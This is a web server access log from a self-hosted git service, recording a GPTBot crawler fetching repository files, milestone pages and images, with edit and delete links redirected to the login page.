"/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good?display=source" [Client 74.7.227.38] [Length 16215] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" +[17/Feb/2026:15:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md?display=source" [Client 74.7.227.38] [Length 11758] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" +[17/Feb/2026:15:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11321] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" +[17/Feb/2026:15:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 16997] [Gzip 11.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:15:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 17128] [Gzip 10.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 26685] [Gzip 16.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:15:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 28042] [Gzip 16.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:15:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 25058] [Gzip 15.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:15:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 159403] [Gzip 20.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:15:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:15:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 11076] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:15:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8509] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" +[17/Feb/2026:15:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8504] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" +[17/Feb/2026:15:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16579] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" +[17/Feb/2026:15:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16209] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" +[17/Feb/2026:15:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:15:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 102161] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:15:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fOld_GoldMonitor.py" [Client 74.7.227.38] [Length 28365] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:15:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12219] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good?display=source" [Client 74.7.227.38] [Length 20452] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" +[17/Feb/2026:15:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13341] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" +[17/Feb/2026:15:44:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" +[17/Feb/2026:15:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/dcsintegration.png" +[17/Feb/2026:15:44:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" +[17/Feb/2026:15:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/dcsintegration.png" +[17/Feb/2026:15:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10033] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" +[17/Feb/2026:15:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" +[17/Feb/2026:15:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" +[17/Feb/2026:15:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13343] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" +[17/Feb/2026:15:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12221] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16057] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:15:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2?display=source" [Client 74.7.227.38] [Length 21983] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" +[17/Feb/2026:15:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15374] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" +[17/Feb/2026:15:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" +[17/Feb/2026:15:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 1377] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" +[17/Feb/2026:15:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13444] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" +[17/Feb/2026:15:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:15:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" +[17/Feb/2026:15:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 11136] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" +[17/Feb/2026:15:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html?display=source" [Client 74.7.227.38] [Length 31030] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" +[17/Feb/2026:15:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" +[17/Feb/2026:15:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js?display=source" [Client 74.7.227.38] [Length 25543] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" +[17/Feb/2026:15:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" +[17/Feb/2026:15:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore?display=source" [Client 74.7.227.38] [Length 11127] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" +[17/Feb/2026:15:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8500] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=furthestduedate&state=open" +[17/Feb/2026:15:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects?q=&sort=alphabetically&state=open" [Client 74.7.227.38] [Length 7805] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/projects" +[17/Feb/2026:15:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html?display=source" [Client 74.7.227.38] [Length 31029] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" +[17/Feb/2026:15:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" +[17/Feb/2026:15:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13388] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" +[17/Feb/2026:15:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 29708] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:15:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 42977] [Gzip 16.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:15:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr 